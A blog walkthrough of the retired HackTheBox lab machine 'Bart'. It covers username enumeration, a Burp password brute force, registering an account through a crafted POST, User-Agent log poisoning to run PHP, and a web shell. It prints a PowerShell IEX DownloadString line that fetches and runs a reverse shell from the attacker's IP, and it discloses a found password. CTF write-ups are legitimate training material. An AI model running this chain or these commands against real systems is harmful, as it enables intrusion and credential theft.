HacktheBox - Bart - Retired
Recon
I've been using threader3000 for a while to do my initial scanning on HTB, I've recently started to use a variant named threader3000 which can automatically run the nmap scan on the resulting open ports found.
Only port 80 open.
It is an IIS server, it also shows a redirect to http://forurm.bart.htb. Since it is IIS we can pretty safely assume this is a windows box.
Let's check it out.
Nothing…
This might just be a DNS resolution issue let's add forum.bart.htb to our /etc/hosts to see if that fixes this
We can use VI to add
10.10.10.81 forum.bart.htb
Now let's try this again.
Not much to go on here, just a list of employee names ( we will file that away for the future)
Let's run a directory brute force against the server and see if we can find anything interesting.
One of the results of the dirb attack is
Let's check that out.
A server monitor page, but it looks like it requires authentication.
Looks like this webapp is PHP Server Monitor v3.2.1
Let's google it and see what we can learn about it
We can try to look around for default logins and such… but I came up empty on that front.
Hey… There is a Forgot Password link there. I wonder what it does?
It asks for a username. Let's try with just test as the username.
Ok we found some employee names on the forum.bart.htb site. Let's try some of those names
Samantha Brown
Daniel Simmons
Robert Hilton
These names are all listed in the Our Team section… But wait there's more.
In the latest News section, there is a post about Daniella Lamborghini being a new employee, let's make sure we include that name too.
I ran Cewl against the site too, I wanted to see if I might have missed any names.
Cewl is a crawler that pulls all the words off a website for you and displays just the list of words. I sent my results to a text file to make it easier to look through
Also from the Employee section we can see that the email address for the company are first initial.lastname@bart.htb
s.brown@bart.htb
So we can build out a quick list of what these employees email addresses probably are
s.brown@bart.thb
d.simmons@bart.htb
r.hilton@bart.htb
d.lamborghini@bart.htb
Let's try these as user names in the server monitor forgot password starting with Mr. Hilton since he is in charge of the tech according to the meet the team page.
Nada… Let's go back to our cewl output.
There is one more name showing up that I can't find anywhere on the site… Harvey
Let's search for it in the source code for the site.
Found them, commented out in the employees section looks like a developer that might no longer be with the company
Harvey Potter….. No comment
So they would be h.pottter@bart.htb…… still not going to touch that name :)
Now if we try to to forgot password for the username harvey we get this message back
An email has been sent with password reset instructions. So the username Harvey is valid for this site.
Exploit
So now we can try to brute force Harvey's password using the cewl.txt we created earlier. Let's take a second and modify our cewl.txt to have 3 versions of the text found. The original, the text in all uppercase and the text in all lower case, just to make our lives a little easier. We can use translate to feed cewl.txt into a new file that converts it to these other options and then combine the lists.
To convert it to all upper we use.
To convert to lower we simple swap the translation around.
Then we can append our original cewl.txt with these two files
We can use Hydra to perform the attack but first let's start up burpsuite to make sure we can format our attack correctly.
Let's capture a bad login using burp suite.
Here we can start extracting what is needed to do our hydra attack.
User_name=harvey
User_password=test
action=login
Since this site uses cookies we will need to add that in our hydra also, or it will not work correctly ( it will actually say that everything is a password, I learned this the hard way :) )
This takes a bit, so Let's up the amount of threads we are using with hydra to 50
We just need to do the switch -t 50
We also need to know what happens and is displayed in the resulting failures to let hydra know what to filter on.
The information is incorrect
So our final hydra command should be..
OMG… this was taking forever so I switched tactics and went with an intruder sniper attack in burp.
Let's go back to burp and send our failed request over to intruder.
Once we click on the positions tab we can see that burp tried to determine the attack points for us and highlighted a bunch of the post request.
So let's hit clear to get back to nothing selected.
Now we will highlight just our password since that is the only thing we want to change with intruder and select add$
Now it has selected just the password for our attack, so now we will go over to the payloads tab and input our Cewl list.
Now, in paid version of burp you can load this the payloads from a file, but I'm using the community addition so I have to highlight all the words in my list, select copy and then use the paste function here to load the list
And now our attack is ready. You can see our payload list loaded up now.
Let's click on Start Attack
Now we will see the request and their response codes and length of the response.
Now we wait until it iterates over our payload list.
What we are looking for here, is either difference in either the status or length.
For every wrong password tried, it should essentially return the same error, which should be the same length. So we can look for results that aren't 3926 in length.
After our attack has run( and it took a very long time to run… like hours for me)
We sort by status code to see if there is anything other than 200( which simply means OK)
Here we can see a status code of 302 (which is a redirect) for the password of potter so this might be the password we are looking for.
Let's try to login with Harvey:potter
Winner winner chicken dinner!!
Let's poke around in here and see what else we might find.
We can see a new subdomain here.
Internal-01.bart.htb
Let's add that to our hosts file and see what we might find there.
We got another login screen. Oi
The same user/pass we used for the Server Monitor doesn't work here, the password is not long enough ( it says we need 8 characters)
Let's through dirb at this new domain and see if we can find anything else interesting being served here.
Let's see if this is some sort of common chat program, just grab the last part of the URL
simple_chat/Login_form.php and pop it into google.
Looks like it might be a AJAX chat that is on github
https://github.com/magkopian/php-ajax-simple-chat/blob/master/README.md
It looks like there should be a registration page,
Let's see if we can verify this is the right thing.
If we start gobuster on it
Looks like the directory structure is matching pretty well.
Let's try to bring up the registration page to see if we can create a new user
Well that's a wrench….
But wait, it looks like it did redirect us to regirester_form.php so we might still be on the right path.
If we look at the code for register_form.php
https://github.com/magkopian/php-ajax-simple-chat/blob/master/simple_chat/register_form.php
Here in the code it looks like it just needs two inputs, one a uname ( which we can assume is username) and another named passwd ( which we can assume is password)
So what if we just send those two in a POST to register.php, can we still add a new user?
Let's try to send a POST request using CURL. We just need to use the -d switch to supply our two fields we want to send.
https://www.educative.io/edpresso/how-to-perform-a-post-request-using-curl
Now, we can try to login with these new credentials
circusmonkey
test1234
We are in…. Not much here though...let's poke around.
We can enter text and it shows up in the chat window..
There is a refresh and log link in the top right, let's check out the source code.
Clicking on log button
We get these messages
Let's see what happens when we go to the link in the code
We see the same 1 we say in the alert box.
Looks like there are a couple of values we can mess with here… filename and username
What happens if we change filename to the actual log.php itself
If we circle back to the txt file we can see it added our user agent to the log file
So now we have another thing we can fuss with..
The useragent.
Let's capture this in burp and edit our user agent.
I'm just going to set it to "Testy McTestFace"
It says ok on the response. And if we look at the txt file again we can see it put what we wanted in there.
So we can write whatever we want to this text file….. This is PHP so what if we send it some PHP?
Let's start with Hello world.
The PHP code for that is
And we can put that in our user agent.
And we see this in the output.
Looks like we can use this to execute PHP
Let's try and ping out to our kali box
Let's make the User Agent
Before we send this GET request, let's setup tcpdump to alert us to ICMP traffic to our hackthebox VPN interface.
-i we specificity which interface to listen on, in this case our VPN tunnel
-n we can filter the traffic so it doesn't show us everything, we chose to filter for just ICMP (Ping)
Now we can send our request.
And here we can see the pings coming in from the server.
Now what?
Now we need to pop our shell.
For Grins and giggles I tried editing the name of log.php to log99.php in my request to see if we could write new files.
Turns out we can, the code execution still works.
If you are unfamiliar with php webshells. This is a great resource, and where I got my code for the next part
https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/
So we can write our own php file to the server.
Let's use this to create php that will accept the argument called cmd
Let's change our User-Agent to
After we send this GET we can then start pass command to the system using the cmd variable we created.
Let's start simple and pass dir since this is a windows box to make sure it working
And we got our directory listing back!
So we can send system commands using the variable we injected.
That's cool and all but what about a real shell?
We can try a number of things like putting netcat on here or sending over the nishangreverse shell script… our options are almost limitless
https://bad-jubies.github.io/RCE-NOW-WHAT/
This blog walks us through using our new cmd variable with PHP to download and invoke nishang Invoke-PowerShellTcp.ps1
I'm going to deviate slightly from the blog post. Instead of stringing two powershell command to download and then execute the reverse shell. Let's modify the PS1 script to include the invocation at the end so it will self execute with the correct settings after its downloaded.
To do this we simply edit the Invoke-PowerShellTcp.ps1 script and add the invocation at the end of the script.
This is my VPN IP as well as the port I want the reverse shell to come in on. I saved this to my /bart folder.
Just a couple more steps before we can test this out.
We need to have a way to serve this PS1 file over to Bart, We need to setup our listener to catch our reverse shell, and we are going to need to encode our payload so it reaches bart the right way.
First let's use updog to serve the file up. It defaults to port 9090
Ok next our listener.
Now we need to format our command. The finally command we want run is
powershell.exe -ExecutionPolicy bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12:9090/Invoke-PowerShellTcp.ps1')
But we will need to URL encode this so it keeps all our formatting.
We can use Burp's built in convert function to handle this for us.
Now we should just need to hit send and hopefully catch our shell
woot !
We got our shell now we need to figure out what we need to do to escalate our privilege from iusr
It's always a good idea to poking around in the directory you land end as well as directories around it, you might find creds in configuration files
Just like C:\inetpub\wwwroot\monitr\config.php
Looks like daniels password for this application is ?St4r1ng1sCr33py?
Maybe that will help us down the road
Type
It just so happens that is the same creds he uses to login to the monitor.bart.htb site
We can continue to poke around but no obvious path forward is revlieling its self.
Let's run winpeas on this to see if it can help us with a path.
First we need to copy winpeas.exe to our folder we are serving up with updog
If you don't have it grab a copy from their github
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
Then we can use poweshell to download it to a temp directory( Which doesn't exist so we need to make it first ( mkdir C:\temp)
Invoke-WebRequest -Uri "http://10.10.14.12:9090/winPEAS.exe" -OutFile "C:\temp\winPEAS.exe"
When we can execute C:\temp\winPEAS.exe
Once it' done executing this bit really grabs my attention
Auto login is present for the administrator account with their password!
Now if this were linux we could just SU and switch over to the administrator account.
I found this blog that looks like it fits perfect for what we want to do
https://davidhamann.de/2019/12/08/running-command-different-user-powershell/
We will need to modify this a bit to use our credentials we found. I also want it to spawn a new reverse shell back to my kali box so we can full command execution.
Comments
Post a Comment